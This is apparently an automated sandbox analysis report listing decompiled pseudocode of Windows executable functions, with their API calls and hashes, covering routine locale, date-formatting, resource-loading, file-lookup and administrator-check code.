                                                            • Opcode Fuzzy Hash: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                            • Instruction Fuzzy Hash: 41D19D75E0011A9FCB00EFA9D4919FEB7B5EF48300BD080B6E801A7245D638AD4ADB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			E0041C790(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
                                                            				char _v8;
                                                            				short _v18;
                                                            				short _v22;
                                                            				struct _SYSTEMTIME _v24;
                                                            				short _v536;
                                                            				short* _t32;
                                                            				intOrPtr* _t47;
                                                            				intOrPtr _t56;
                                                            				void* _t61;
                                                            				intOrPtr _t63;
                                                            				void* _t67;
                                                            
                                                            				_v8 = 0;
                                                            				_t47 = __edx;
                                                            				_t61 = __eax;
                                                            				_push(_t67);
                                                            				_push(0x41c873);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t67 + 0xfffffdec;
                                                            				E00407A20(__edx);
                                                            				_v24 =  *(_a4 - 2) & 0x0000ffff;
                                                            				_v22 =  *(_a4 - 4) & 0x0000ffff;
                                                            				_v18 =  *(_a4 - 6) & 0x0000ffff;
                                                            				if(_t61 > 2) {
                                                            					E00407E48( &_v8, L"yyyy");
                                                            				} else {
                                                            					E00407E48( &_v8, 0x41c88c);
                                                            				}
                                                            				_t32 = E004084EC(_v8);
                                                            				if(GetDateFormatW(GetThreadLocale(), 4,  &_v24, _t32,  &_v536, 0x200) != 0) {
                                                            					E0040858C(_t47, 0x100,  &_v536);
                                                            					if(_t61 == 1 &&  *((short*)( *_t47)) == 0x30) {
                                                            						_t63 =  *_t47;
                                                            						if(_t63 != 0) {
                                                            							_t63 =  *((intOrPtr*)(_t63 - 4));
                                                            						}
                                                            						E004088AC( *_t47, _t63 - 1, 2, _t47);
                                                            					}
                                                            				}
                                                            				_pop(_t56);
                                                            				 *[fs:eax] = _t56;
                                                            				_push(0x41c87a);
                                                            				return E00407A20( &_v8);
                                                            			}

                                                            APIs
                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C816
                                                            • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C81C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: DateFormatLocaleThread
                                                            • String ID: $yyyy
                                                            • API String ID: 3303714858-404527807
                                                            • Opcode ID: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                            • Instruction ID: d4c72dfe3e93bc103dd676e1b73ac12d517b544291048ec360f079cc1ca068dc
                                                            • Opcode Fuzzy Hash: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                            • Instruction Fuzzy Hash: 9A215335A442189BDB11EF95CDC1AAEB3B8EF08701F5144BBFC45E7281D7789E4087AA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 85%
                                                            			E0041EEFC(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* _a4) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _v12;
                                                            				char _v534;
                                                            				short _v1056;
                                                            				short _v1568;
                                                            				struct _MEMORY_BASIC_INFORMATION _v1596;
                                                            				char _v1600;
                                                            				intOrPtr _v1604;
                                                            				char _v1608;
                                                            				intOrPtr _v1612;
                                                            				char _v1616;
                                                            				intOrPtr _v1620;
                                                            				char _v1624;
                                                            				char* _v1628;
                                                            				char _v1632;
                                                            				char _v1636;
                                                            				char _v1640;
                                                            				intOrPtr _t55;
                                                            				signed int _t76;
                                                            				void* _t82;
                                                            				intOrPtr _t83;
                                                            				intOrPtr _t95;
                                                            				intOrPtr _t98;
                                                            				intOrPtr _t100;
                                                            				intOrPtr* _t102;
                                                            				void* _t105;
                                                            
                                                            				_v1640 = 0;
                                                            				_v8 = __ecx;
                                                            				_t82 = __edx;
                                                            				_t102 = __eax;
                                                            				_push(_t105);
                                                            				_push(0x41f0a8);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t105 + 0xfffff99c;
                                                            				VirtualQuery(__edx,  &_v1596, 0x1c);
                                                            				if(_v1596.State != 0x1000 || GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105) == 0) {
                                                            					GetModuleFileNameW( *0x4be634,  &_v1056, 0x105);
                                                            					_v12 = E0041EEF0(_t82);
                                                            				} else {
                                                            					_v12 = _t82 - _v1596.AllocationBase;
                                                            				}
                                                            				E0041A57C( &_v534, 0x104, E00420608() + 2);
                                                            				_t83 = 0x41f0bc;
                                                            				_t100 = 0x41f0bc;
                                                            				_t95 =  *0x414db8; // 0x414e10
                                                            				if(E00405F30(_t102, _t95) != 0) {
                                                            					_t83 = E004084EC( *((intOrPtr*)(_t102 + 4)));
                                                            					_t76 = E00407F04(_t83);
                                                            					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
                                                            						_t100 = 0x41f0c0;
                                                            					}
                                                            				}
                                                            				_t55 =  *0x4ba774; // 0x40e708
                                                            				_t18 = _t55 + 4; // 0xffec
                                                            				LoadStringW(E00409FF0( *0x4be634),  *_t18,  &_v1568, 0x100);
                                                            				E00405BE8( *_t102,  &_v1640);
                                                            				_v1636 = _v1640;
                                                            				_v1632 = 0x11;
                                                            				_v1628 =  &_v534;
                                                            				_v1624 = 0xa;
                                                            				_v1620 = _v12;
                                                            				_v1616 = 5;
                                                            				_v1612 = _t83;
                                                            				_v1608 = 0xa;
                                                            				_v1604 = _t100;
                                                            				_v1600 = 0xa;
                                                            				E0041A814(4,  &_v1636);
                                                            				E00407F04(_v8);
                                                            				_pop(_t98);
                                                            				 *[fs:eax] = _t98;
                                                            				_push(0x41f0af);
                                                            				return E00407A20( &_v1640);
                                                            			}

                                                            APIs
                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                            • LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                            • String ID:
                                                            • API String ID: 3990497365-0
                                                            • Opcode ID: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                            • Instruction ID: 1578eb45e464442e6080653f6025888c356fcaddc808aab3f6789ba0ce71ce89
                                                            • Opcode Fuzzy Hash: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                            • Instruction Fuzzy Hash: 3E412374A002589FDB20DF59CC81BCAB7F9AB58304F4044FAE508E7242D7799E95CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E0040A6C8(signed short __eax, void* __edx) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				intOrPtr _v16;
                                                            				signed int _v20;
                                                            				short _v22;
                                                            				short _v24;
                                                            				char _v26;
                                                            				char _v32;
                                                            				void* __ebp;
                                                            				void* _t39;
                                                            				void* _t55;
                                                            				void* _t59;
                                                            				short* _t62;
                                                            				signed short _t66;
                                                            				void* _t67;
                                                            				void* _t68;
                                                            				signed short _t79;
                                                            				void* _t81;
                                                            
                                                            				_t81 = __edx;
                                                            				_t66 = __eax;
                                                            				_v16 = 0;
                                                            				if(__eax !=  *0x4bdc08()) {
                                                            					_v16 = E0040A684( &_v8);
                                                            					_t79 = _t66;
                                                            					_v20 = 3;
                                                            					_t62 =  &_v26;
                                                            					do {
                                                            						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
                                                            						_t79 = (_t79 & 0x0000ffff) >> 4;
                                                            						_v20 = _v20 - 1;
                                                            						_t62 = _t62 - 2;
                                                            					} while (_v20 != 0xffffffff);
                                                            					_v24 = 0;
                                                            					_v22 = 0;
                                                            					 *0x4bdc04(4,  &_v32,  &_v20);
                                                            				}
                                                            				_t39 = E0040A684( &_v12);
                                                            				_t67 = _t39;
                                                            				if(_t67 != 0) {
                                                            					_t55 = _v12 - 2;
                                                            					if(_t55 >= 0) {
                                                            						_t59 = _t55 + 1;
                                                            						_v20 = 0;
                                                            						do {
                                                            							if( *((short*)(_t67 + _v20 * 2)) == 0) {
                                                            								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
                                                            							}
                                                            							_v20 = _v20 + 1;
                                                            							_t59 = _t59 - 1;
                                                            						} while (_t59 != 0);
                                                            					}
                                                            					E00408550(_t81, _t67);
                                                            					_t39 = E0040540C(_t67);
                                                            				}
                                                            				if(_v16 != 0) {
                                                            					 *0x4bdc04(0, 0,  &_v20);
                                                            					_t68 = E0040A684( &_v12);
                                                            					if(_v8 != _v12 || E0040A660(_v16, _v12, _t68) != 0) {
                                                            						 *0x4bdc04(8, _v16,  &_v20);
                                                            					}
                                                            					E0040540C(_t68);
                                                            					return E0040540C(_v16);
                                                            				}
                                                            				return _t39;
                                                            			}

                                                            APIs
                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040A6D9
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040A737
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040A794
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040A7C7
                                                              • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040A745), ref: 0040A69B
                                                              • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040A745), ref: 0040A6B8
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Thread$LanguagesPreferred$Language
                                                            • String ID:
                                                            • API String ID: 2255706666-0
                                                            • Opcode ID: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                            • Instruction ID: 64ac70e7ec2a8712ea9b0e83aabe60772fb1db60419ab041f5eb1837937ee239
                                                            • Opcode Fuzzy Hash: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                            • Instruction Fuzzy Hash: 97317070E0021A9BDB10DFA9C884AAFB7B8EF04304F00867AE555E7291EB789E05CB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004AF9F0() {
                                                            				struct HRSRC__* _t10;
                                                            				void* _t11;
                                                            				void* _t12;
                                                            
                                                            				_t10 = FindResourceW(0, 0x2b67, 0xa);
                                                            				if(_t10 == 0) {
                                                            					E004AF834();
                                                            				}
                                                            				if(SizeofResource(0, _t10) != 0x2c) {
                                                            					E004AF834();
                                                            				}
                                                            				_t11 = LoadResource(0, _t10);
                                                            				if(_t11 == 0) {
                                                            					E004AF834();
                                                            				}
                                                            				_t12 = LockResource(_t11);
                                                            				if(_t12 == 0) {
                                                            					E004AF834();
                                                            				}
                                                            				return _t12;
                                                            			}

                                                            APIs
                                                            • FindResourceW.KERNEL32(00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 004AF9FA
                                                            • SizeofResource.KERNEL32(00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E), ref: 004AFA0D
                                                            • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000), ref: 004AFA1F
                                                            • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002), ref: 004AFA30
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Resource$FindLoadLockSizeof
                                                            • String ID:
                                                            • API String ID: 3473537107-0
                                                            • Opcode ID: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                            • Instruction ID: 8c15b2061d88d30e204a2d131290402b8da5209396f43898e5d703764eea749b
                                                            • Opcode Fuzzy Hash: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                            • Instruction Fuzzy Hash: FCE07E8074634625FA6436F718D7BAE00084B36B4DF40593FFA08A92D2EEAC8C19522E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00420BD8() {
                                                            				void* __ebx;
                                                            				struct HINSTANCE__* _t1;
                                                            				void* _t4;
                                                            
                                                            				_t1 = GetModuleHandleW(L"kernel32.dll");
                                                            				_t3 = _t1;
                                                            				if(_t1 != 0) {
                                                            					_t1 = E0040E1A8(_t3, _t4, _t3, L"GetDiskFreeSpaceExW");
                                                            					 *0x4b7e30 = _t1;
                                                            				}
                                                            				if( *0x4b7e30 == 0) {
                                                            					 *0x4b7e30 = E0041A4DC;
                                                            					return E0041A4DC;
                                                            				}
                                                            				return _t1;
                                                            			}

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00420CB4,00000000,00420CCC,?,?,00420C69), ref: 00420BDE
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                            • API String ID: 1646373207-1127948838
                                                            • Opcode ID: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                            • Instruction ID: d69f2d486575a746b5ffe9d6a82661523d0842203aaa5c8b8dd0cb43f1f92830
                                                            • Opcode Fuzzy Hash: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                            • Instruction Fuzzy Hash: 31D05EB03143165FE7056BB2ACC561636C6AB86304B900B7BA5046A243CBFDDC50434C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Executed Functions

                                                            C-Code - Quality: 73%
                                                            			E0040E7F0(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
                                                            				char _v8;
                                                            				short _v12;
                                                            				void* _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				void* _t29;
                                                            				void* _t40;
                                                            				intOrPtr* _t44;
                                                            				intOrPtr _t55;
                                                            				void* _t61;
                                                            
                                                            				_push(__ebx);
                                                            				_v24 = 0;
                                                            				_v20 = 0;
                                                            				_t44 = __edx;
                                                            				_v8 = __eax;
                                                            				E0040A2AC(_v8);
                                                            				_push(_t61);
                                                            				_push(0x40e8b0);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t61 + 0xffffffec;
                                                            				_t21 =  &_v16;
                                                            				L0040524C();
                                                            				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
                                                            				E0040B318( &_v20, 4,  &_v16);
                                                            				E0040B4C8(_t44, _v20, _v8);
                                                            				_t29 = E0040E6A0( *_t44, _t44); // executed
                                                            				if(_t29 == 0) {
                                                            					_v12 = 0;
                                                            					E0040B318( &_v24, 4,  &_v16);
                                                            					E0040B4C8(_t44, _v24, _v8);
                                                            					_t40 = E0040E6A0( *_t44, _t44); // executed
                                                            					if(_t40 == 0) {
                                                            						E0040A1C8(_t44);
                                                            					}
                                                            				}
                                                            				_pop(_t55);
                                                            				 *[fs:eax] = _t55;
                                                            				_push(E0040E8B7);
                                                            				E0040A228( &_v24, 2);
                                                            				return E0040A1C8( &_v8);
                                                            			}

                                                            APIs
                                                            • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E822
                                                            • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E82B
                                                              • Part of subcall function 0040E6A0: FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                              • Part of subcall function 0040E6A0: FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                            • String ID:
                                                            • API String ID: 3216391948-0
                                                            • Opcode ID: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                            • Instruction ID: 1e50cd0e94847efb8cb05e6df71b151ee34378a03d53e12baea26e8823c5d93b
                                                            • Opcode Fuzzy Hash: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                            • Instruction Fuzzy Hash: 71114270A002099BDB04EF96D982AAEB3B9EF45304F90487EF904B73C1D7395E148B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 60%
                                                            			E0060C2B0(void* __eax, struct _WIN32_FIND_DATAW* __ecx, void* __edx, void* __eflags) {
                                                            				void* _v8;
                                                            				char _v16;
                                                            				long _v20;
                                                            				void* _t13;
                                                            				intOrPtr _t27;
                                                            				void* _t35;
                                                            				void* _t37;
                                                            				intOrPtr _t38;
                                                            
                                                            				_t35 = _t37;
                                                            				_t38 = _t37 + 0xfffffff0;
                                                            				if(E0060BF74(__eax,  &_v16) != 0) {
                                                            					_push(_t35);
                                                            					_push(0x60c313);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t38;
                                                            					_t13 = FindFirstFileW(E0040B278(__edx), __ecx); // executed
                                                            					_v8 = _t13;
                                                            					_v20 = GetLastError();
                                                            					_pop(_t27);
                                                            					 *[fs:eax] = _t27;
                                                            					_push(E0060C31A);
                                                            					return E0060BFB0( &_v16);
                                                            				} else {
                                                            					_v8 = 0xffffffff;
                                                            					return _v8;
                                                            				}
                                                            			}

                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2ED
                                                            • GetLastError.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2F5
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorFileFindFirstLast
                                                            • String ID:
                                                            • API String ID: 873889042-0
                                                            • Opcode ID: 48cb86c36632e8c72cb41299c80d55c8f2305584a3cc239000e223bcc48676ca
                                                            • Instruction ID: 0e0656a6fbe86c5836fc78b0efda7e26b232c5910eabf30e6ebd6b813bae866c
                                                            • Opcode Fuzzy Hash: 48cb86c36632e8c72cb41299c80d55c8f2305584a3cc239000e223bcc48676ca
                                                            • Instruction Fuzzy Hash: 1BF0F931A84208ABCB14DFBA9C0189FF7ADEB4533075147BAF814D32D1DB744E004598
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0040E6A0(char __eax, signed int __ebx) {
                                                            				char _v8;
                                                            				struct _WIN32_FIND_DATAW _v600;
                                                            				void* _t15;
                                                            				intOrPtr _t24;
                                                            				void* _t27;
                                                            
                                                            				_push(__ebx);
                                                            				_v8 = __eax;
                                                            				E0040A2AC(_v8);
                                                            				_push(_t27);
                                                            				_push(0x40e6fe);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t27 + 0xfffffdac;
                                                            				_t15 = FindFirstFileW(E0040B278(_v8),  &_v600); // executed
                                                            				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
                                                            					FindClose(_t15);
                                                            				}
                                                            				_pop(_t24);
                                                            				 *[fs:eax] = _t24;
                                                            				_push(E0040E705);
                                                            				return E0040A1C8( &_v8);
                                                            			}









                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                            • Instruction ID: dec86fcb97929b74413189edb203bd87f329489ef31ab21fd3caa719f1a03e71
                                                            • Opcode Fuzzy Hash: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                            • Instruction Fuzzy Hash: 95F0B430540608AFCB10EBB6DC4295EB3ACEB4431479009B6F400F32D1EB395E10995C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 43%
                                                            			E005C7CE0(long __eax) {
                                                            				signed char _v5;
                                                            				void* _v12;
                                                            				char _v16;
                                                            				void* _v20;
                                                            				long _v24;
                                                            				void* _v28;
                                                            				struct _SID_IDENTIFIER_AUTHORITY* _v32;
                                                            				void* __ebx;
                                                            				void* __esi;
                                                            				void* __ebp;
                                                            				void* _t89;
                                                            				long _t97;
                                                            				signed int _t100;
                                                            				intOrPtr _t105;
                                                            				intOrPtr _t106;
                                                            				void* _t107;
                                                            				void* _t110;
                                                            				void* _t111;
                                                            				void* _t113;
                                                            				void* _t115;
                                                            				intOrPtr _t116;
                                                            
                                                            				_t113 = _t115;
                                                            				_t116 = _t115 + 0xffffffe4;
                                                            				_push(_t107);
                                                            				_t97 = __eax;
                                                            				if(E00429D18() == 2) {
                                                            					_v5 = 0;
                                                            					_v32 = 0x6ccce0;
                                                            					if(AllocateAndInitializeSid(_v32, 2, 0x20, _t97, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
                                                            						goto L26;
                                                            					} else {
                                                            						_push(_t113);
                                                            						_push(0x5c7ecb);
                                                            						_push( *[fs:eax]);
                                                            						 *[fs:eax] = _t116;
                                                            						_t99 = 0;
                                                            						if((GetVersion() & 0x000000ff) >= 5) {
                                                            							_t99 = E00414020(0, _t107, GetModuleHandleW(L"advapi32.dll"), L"CheckTokenMembership");
                                                            						}
                                                            						if(_t99 == 0) {
                                                            							_v28 = 0;
                                                            							if(OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v20) != 0) {
                                                            								L13:
                                                            								_push(_t113);
                                                            								_push(0x5c7ead);
                                                            								_push( *[fs:eax]);
                                                            								 *[fs:eax] = _t116;
                                                            								_v24 = 0;
                                                            								if(GetTokenInformation(_v20, 2, 0, 0,  &_v24) != 0 || GetLastError() == 0x7a) {
                                                            									_v28 = E00406F0C(_v24);
                                                            									if(GetTokenInformation(_v20, 2, _v28, _v24,  &_v24) != 0) {
                                                            										_t110 =  *_v28 - 1;
                                                            										if(_t110 >= 0) {
                                                            											_t111 = _t110 + 1;
                                                            											_t100 = 0;
                                                            											while(EqualSid(_v12,  *(_v28 + 4 + _t100 * 8)) == 0 || ( *(_v28 + 8 + _t100 * 8) & 0x00000014) != 4) {
                                                            												_t100 = _t100 + 1;
                                                            												_t111 = _t111 - 1;
                                                            												if(_t111 != 0) {
                                                            													continue;
                                                            												}
                                                            												goto L24;
                                                            											}
                                                            											_v5 = 1;
                                                            										}
                                                            										L24:
                                                            										_pop(_t105);
                                                            										 *[fs:eax] = _t105;
                                                            										_push(E005C7EB4);
                                                            										E00406F28(_v28);
                                                            										return CloseHandle(_v20);
                                                            									} else {
                                                            										E004099B8();
                                                            										E004099B8();
                                                            										goto L26;
                                                            									}
                                                            								} else {
                                                            									E004099B8();
                                                            									E004099B8();
                                                            									goto L26;
                                                            								}
                                                            							} else {
                                                            								if(GetLastError() == 0x3f0) {
                                                            									if(OpenProcessToken(GetCurrentProcess(), 8,  &_v20) != 0) {
                                                            										goto L13;
                                                            									} else {
                                                            										E004099B8();
                                                            										goto L26;
                                                            									}
                                                            								} else {
                                                            									E004099B8();
                                                            									goto L26;
                                                            								}
                                                            							}
                                                            						} else {
                                                            							_t89 =  *_t99(0, _v12,  &_v16); // executed
                                                            							if(_t89 != 0) {
                                                            								asm("sbb eax, eax");
                                                            								_v5 = _t89 + 1;
                                                            							}
                                                            							_pop(_t106);
                                                            							 *[fs:eax] = _t106;
                                                            							_push(E005C7ED2);
                                                            							return FreeSid(_v12);
                                                            						}
                                                            					}
                                                            				} else {
                                                            					_v5 = 1;
                                                            					L26:
                                                            					return _v5 & 0x000000ff;
                                                            				}
                                                            			}

























                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D22
                                                            • GetVersion.KERNEL32(00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D3F
                                                            • GetModuleHandleW.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D59
                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D74
                                                            • FreeSid.ADVAPI32(00000000,005C7ED2,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7EC5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AllocateCheckFreeHandleInitializeMembershipModuleTokenVersion
                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                            • API String ID: 2691416632-1888249752
